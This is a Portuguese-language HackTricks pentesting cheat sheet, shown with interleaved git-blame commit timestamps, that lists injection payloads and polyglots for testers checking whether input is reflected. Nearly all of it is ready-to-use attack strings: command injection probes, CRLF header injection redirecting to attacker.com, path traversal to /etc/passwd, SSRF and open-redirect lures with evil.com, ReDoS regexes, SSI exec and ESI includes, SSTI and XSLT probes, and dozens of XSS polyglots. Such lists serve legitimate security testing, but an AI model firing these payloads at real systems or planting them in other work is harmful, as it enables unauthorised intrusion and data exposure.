2022-04-28 16:01:33 +00:00
< details >
2023-04-25 18:35:28 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
- Você trabalha em uma **empresa de segurança cibernética** ? Você quer ver sua **empresa anunciada no HackTricks** ? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF** ? Confira os [**PLANOS DE ASSINATURA** ](https://github.com/sponsors/carlospolop )!
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
- Descubra [**A Família PEASS** ](https://opensea.io/collection/the-peass-family ), nossa coleção exclusiva de [**NFTs** ](https://opensea.io/collection/the-peass-family )
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
- Adquira o [**swag oficial do PEASS & HackTricks** ](https://peass.creator-spring.com )
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
- **Junte-se ao** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**grupo do Discord** ](https://discord.gg/hRep4RUj7f ) ou ao [**grupo do telegram** ](https://t.me/peass ) ou **siga-me** no **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/hacktricks_live )**.**
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks ](https://github.com/carlospolop/hacktricks ) e [hacktricks-cloud repo ](https://github.com/carlospolop/hacktricks-cloud )**.
2022-04-28 16:01:33 +00:00
< / details >
2023-06-06 18:56:34 +00:00
O objetivo desses PoCs e Polygloths é fornecer ao testador um **resumo rápido** das vulnerabilidades que ele pode explorar se sua **entrada for de alguma forma refletida na resposta** .
2021-06-26 12:03:36 +00:00
2021-06-26 12:11:00 +00:00
{% hint style="warning" %}
2023-06-06 18:56:34 +00:00
Esta **folha de dicas não propõe uma lista abrangente de testes para cada vulnerabilidade** , apenas alguns básicos. Se você está procurando testes mais abrangentes, acesse cada vulnerabilidade proposta.
2021-06-26 12:11:00 +00:00
{% endhint %}
2021-06-26 12:03:36 +00:00
2021-06-26 12:11:00 +00:00
{% hint style="danger" %}
2023-06-06 18:56:34 +00:00
Você **não encontrará injeções dependentes de Content-Type como XXE** , pois geralmente você mesmo tentará essas injeções se encontrar uma solicitação enviando dados xml. Você **também não encontrará injeções de banco de dados** aqui, pois mesmo que alguns conteúdos possam ser refletidos, isso depende muito da tecnologia e estrutura do banco de dados backend.
2021-06-26 12:11:00 +00:00
{% endhint %}
2021-06-26 12:03:36 +00:00
2023-06-06 18:56:34 +00:00
# Lista de Polygloths
2021-06-26 10:02:37 +00:00
```python
{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
2021-06-26 12:03:36 +00:00
< br > < b > < h1 > THIS IS AND INJECTED TITLE < / h1 >
2021-06-26 10:02:37 +00:00
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
<!-- #echo var="DATE_LOCAL" --> <!-- #exec cmd="ls" --> < esi:include src = http://attacker.com/ > x=< esi:assign name = "var1" value = "'cript'" / > < s < esi:vars name = "$(var1)" / > >alert(/Chrome%20XSS%20filter%20bypass/);< /s< esi:vars name = "$(var1)" / > >
{{7*7}}${7*7}< %= 7*7 %>${{7*7}}#{7*7}${{< %[%'"}}%\
< xsl:value-of select = "system-property('xsl:version')" / > < esi:include src = "http://10.10.10.10/data/news.xml" stylesheet = "http://10.10.10.10//news_template.xsl" > < / esi:include >
" onclick=alert() a="
'">< img src = x onerror = alert(1) / >
javascript:alert()
javascript:"/*'/*`/*--></ noscript ></ title ></ textarea ></ style ></ template ></ noembed ></ script >< html \" onmouseover = /*<svg/*/onload=alert()// >
-->'"/></ sCript >< deTailS open x = ">" ontoggle = (co \u006efirm)`` >
">>< marquee >< img src = x onerror = confirm(1) ></ marquee > " >< /plaintext\>< /|\>< plaintext / onmouseover = prompt(1) >< script > prompt ( 1 )</ script > @gmail.com< isindex formaction = javascript:alert(/XSS/) type = submit > '-->" ></ script >< script > alert ( 1 )</ script > ">< img / id = "confirm( 1)" / alt = "/" src = "/" onerror = eval(id&%23x29; > '">< img src = "http: //i.imgur.com/P8mL8.jpg" >
" onclick=alert(1)//< button ‘ onclick = alert(1)// > */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >< / SCRIPT > ">'>< SCRIPT > alert ( String . fromCharCode ( 88 , 83 , 83 ) ) < / SCRIPT >
```
2023-06-06 18:56:34 +00:00
# [Injeção de Modelo do Lado do Cliente](../client-side-template-injection-csti.md)
2021-06-25 19:22:16 +00:00
2023-06-06 18:56:34 +00:00
## Testes Básicos
2021-10-18 11:21:18 +00:00
```
2021-06-25 16:39:43 +00:00
{{7*7}}
2021-06-25 16:50:01 +00:00
[7*7]
2021-06-25 16:39:43 +00:00
```
2023-06-06 18:56:34 +00:00
## Poliglotas
2021-06-25 17:01:56 +00:00
```bash
{{7*7}}[7*7]
```
2023-06-06 18:56:34 +00:00
# [Injeção de Comando](../command-injection.md)
2021-06-25 17:01:56 +00:00
2023-06-06 18:56:34 +00:00
## Testes Básicos
2021-06-25 17:01:56 +00:00
```bash
2021-06-26 10:02:37 +00:00
;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
2021-06-25 16:50:01 +00:00
`ls`
$(ls)
2021-06-25 17:01:56 +00:00
```
2023-06-06 18:56:34 +00:00
## Poliglotas
2021-06-25 17:01:56 +00:00
```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
2021-06-25 16:50:01 +00:00
```
2022-05-01 12:41:36 +00:00
# [CRLF](../crlf-0d-0a.md)
2021-06-25 17:01:56 +00:00
2023-06-06 18:56:34 +00:00
## Testes Básicos
2021-06-25 17:01:56 +00:00
```bash
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
```
2023-06-06 18:56:34 +00:00
# Marcação Pendente
2021-06-25 16:50:01 +00:00
2023-06-06 18:56:34 +00:00
## Testes Básicos
2021-06-26 12:03:36 +00:00
```markup
< br > < b > < h1 > THIS IS AND INJECTED TITLE < / h1 >
```
2023-06-06 18:56:34 +00:00
# [Inclusão de Arquivos/Travessia de Diretórios](../inclusao-de-arquivos/)
2021-06-26 12:03:36 +00:00
2023-06-06 18:56:34 +00:00
## Testes Básicos
2021-06-25 19:22:16 +00:00
```bash
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
```
2023-06-06 18:56:34 +00:00
# [Redirecionamento Aberto](../open-redirect.md) / [Falsificação de Solicitação do Lado do Servidor](../ssrf-server-side-request-forgery/)
2021-06-25 19:22:16 +00:00
2023-06-06 18:56:34 +00:00
## Testes Básicos
2021-06-25 19:22:16 +00:00
```bash
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
```
2022-05-01 12:41:36 +00:00
# [ReDoS](../regular-expression-denial-of-service-redos.md)
2021-06-25 19:22:16 +00:00
2023-06-06 18:56:34 +00:00
## Testes Básicos
2021-06-25 19:22:16 +00:00
```bash
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
```
2023-06-06 18:56:34 +00:00
# [Inclusão do Lado do Servidor/Inclusão do Lado da Borda](../server-side-inclusion-edge-side-inclusion-injection.md)
2021-06-25 19:22:16 +00:00
2023-06-06 18:56:34 +00:00
## Testes Básicos
2021-06-25 19:22:16 +00:00
```markup
<!-- #echo var="DATE_LOCAL" -->
<!-- #exec cmd="ls" -->
< esi:include src = http://attacker.com/ >
2021-06-25 19:23:35 +00:00
x=< esi:assign name = "var1" value = "'cript'" / > < s < esi:vars name = "$(var1)" / > >alert(/Chrome%20XSS%20filter%20bypass/);< /s< esi:vars name = "$(var1)" / > >
2021-06-25 19:22:16 +00:00
```
2023-06-06 18:56:34 +00:00
## Poliglotas
2021-06-25 20:23:31 +00:00
```markup
<!-- #echo var="DATE_LOCAL" --> <!-- #exec cmd="ls" --> < esi:include src = http://attacker.com/ > x=< esi:assign name = "var1" value = "'cript'" / > < s < esi:vars name = "$(var1)" / > >alert(/Chrome%20XSS%20filter%20bypass/);< /s< esi:vars name = "$(var1)" / > >
```
2023-06-06 18:56:34 +00:00
# [Falsificação de solicitação do lado do servidor](../ssrf-server-side-request-forgery/)
2021-06-25 20:23:31 +00:00
2023-06-06 18:56:34 +00:00
Os mesmos testes usados para Redirecionamento Aberto podem ser usados aqui.
2021-06-26 12:03:36 +00:00
2023-06-06 18:56:34 +00:00
# [Injeção de modelo do lado do servidor](../ssti-server-side-template-injection/)
2021-06-25 20:23:31 +00:00
2023-06-06 18:56:34 +00:00
## Testes básicos
2021-06-25 20:23:31 +00:00
```markup
${{< %[%'"}}%\
{{7*7}}
${7*7}
< %= 7*7 %>
${{7*7}}
#{7*7}
```
2023-06-06 18:56:34 +00:00
## Poliglotas
2021-06-25 20:23:31 +00:00
```python
{{7*7}}${7*7}< %= 7*7 %>${{7*7}}#{7*7}${{< %[%'"}}%\
```
2023-06-06 18:56:34 +00:00
# [Injeção de XSLT do lado do servidor](../xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)
2021-06-25 20:23:31 +00:00
2023-06-06 18:56:34 +00:00
## Testes Básicos
2021-06-25 20:23:31 +00:00
```markup
< xsl:value-of select = "system-property('xsl:version')" / >
< esi:include src = "http://10.10.10.10/data/news.xml" stylesheet = "http://10.10.10.10//news_template.xsl" > < / esi:include >
```
2023-06-06 18:56:34 +00:00
## Poliglotas
2021-06-25 20:23:31 +00:00
```markup
< xsl:value-of select = "system-property('xsl:version')" / > < esi:include src = "http://10.10.10.10/data/news.xml" stylesheet = "http://10.10.10.10//news_template.xsl" > < / esi:include >
```
2022-05-01 12:41:36 +00:00
# XSS
2021-06-26 10:02:37 +00:00
2023-06-06 18:56:34 +00:00
## Testes Básicos
2021-06-26 10:02:37 +00:00
```markup
" onclick=alert() a="
'">< img src = x onerror = alert(1) / >
javascript:alert()
```
2023-06-06 18:56:34 +00:00
## Poliglotas
2021-06-26 10:02:37 +00:00
```markup
javascript:"/*'/*`/*--></ noscript ></ title ></ textarea ></ style ></ template ></ noembed ></ script >< html \" onmouseover = /*<svg/*/onload=alert()// >
-->'"/></ sCript >< deTailS open x = ">" ontoggle = (co \u006efirm)`` >
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//< /stYle/< /titLe/< /teXtarEa/< /scRipt/--!>\x3csVg/< sVg / oNloAd = alert()// > \x3e
">>< marquee >< img src = x onerror = confirm(1) ></ marquee > " >< /plaintext\>< /|\>< plaintext / onmouseover = prompt(1) >< script > prompt ( 1 )</ script > @gmail.com< isindex formaction = javascript:alert(/XSS/) type = submit > '-->" ></ script >< script > alert ( 1 )</ script > ">< img / id = "confirm( 1)" / alt = "/" src = "/" onerror = eval(id&%23x29; > '">< img src = "http: //i.imgur.com/P8mL8.jpg" >
" onclick=alert(1)//< button ‘ onclick = alert(1)// > */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >< / SCRIPT > ">'>< SCRIPT > alert ( String . fromCharCode ( 88 , 83 , 83 ) ) < / SCRIPT >
javascript://'/< / title > < / style > < / textarea > < / script > -->< p " onclick = alert()// > */alert()/*
javascript://-->< / script > < / title > < / style > "/< / textarea > */< alert ( ) / * ' onclick = alert()// > a
javascript://< / title > "/< / script > < / style > < /textarea/-->*/< alert ( ) / * ' onclick = alert()// > /
javascript://< / title > < / style > < / textarea > -->< / script > < a " / / ' onclick = alert()// > */alert()/*
javascript://'//" -->< / textarea > < / style > < / script > < / title > < b onclick = alert()// > */alert()/*
javascript://< / title > < / textarea > < / style > < /script -->< li ' / / " ' * / alert ( ) / * ' , onclick = alert()//
javascript:alert()//-->< / script > < / textarea > < / style > < / title > < a " / / ' onclick = alert()// > */alert()/*
-->< / script > < / title > < / style > "/< / textarea > < a ' onclick = alert()// > */alert()/*
/< /title/'/< /style/< /script/< /textarea/-->< p " onclick = alert()// > */alert()/*
javascript://-->< / title > < / style > < / textarea > < / script > < svg " / / ' onclick = alert()//
/< /title/'/< /style/< /script/-->< p " onclick = alert()// > */alert()/*
-->'"/></ sCript >< svG x = ">" onload = (co \u006efirm)`` >
< svg % 0Ao % 00nload = %09((pro \u006dpt))()//
javascript:"/*'/*`/*\" /*</ title ></ style ></ textarea ></ noscript ></ noembed ></ template > < /script/-->< svg / onload = /*<html/*/onmouseover=alert()// >
javascript:"/*\"/*`/*' /*</ template ></ textarea ></ noembed ></ noscript ></ title ></ style ></ script > -->< svg onload = /*<html/*/onmouseover=alert()// >
javascript:`//"//\"//</ title ></ textarea ></ style ></ noscript ></ noembed ></ script ></ template >< svg / onload = '/*--><html */ onmouseover=alert()//' > `
%0ajavascript:`/*\"/*-->< svg onload='/*</ template ></ noembed ></ noscript ></ style ></ title ></ textarea ></ script >< html onmouseover = "/**/ alert(test)//'" > `
javascript:/*-->< / title > < / style > < / textarea > < / script > < / xmp > < svg / onload = '+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//' >
javascript:"/*'/*`/*--></ noscript ></ title ></ textarea ></ style ></ template ></ noembed ></ script >< html \" onmouseover = /*<svg/*/onload=document.location=`//localhost/mH`// >
```
2022-04-28 16:01:33 +00:00
< details >
2023-04-25 18:35:28 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
- Você trabalha em uma **empresa de segurança cibernética** ? Você quer ver sua **empresa anunciada no HackTricks** ? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF** ? Confira os [**PLANOS DE ASSINATURA** ](https://github.com/sponsors/carlospolop )!
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
- Descubra [**A Família PEASS** ](https://opensea.io/collection/the-peass-family ), nossa coleção exclusiva de [**NFTs** ](https://opensea.io/collection/the-peass-family )
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
- Adquira o [**swag oficial do PEASS & HackTricks** ](https://peass.creator-spring.com )
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
- **Junte-se ao** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**grupo do Discord** ](https://discord.gg/hRep4RUj7f ) ou ao [**grupo do telegram** ](https://t.me/peass ) ou **siga-me** no **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/hacktricks_live )**.**
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
- **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks ](https://github.com/carlospolop/hacktricks ) e [hacktricks-cloud repo ](https://github.com/carlospolop/hacktricks-cloud )**.
2022-04-28 16:01:33 +00:00
< / details >
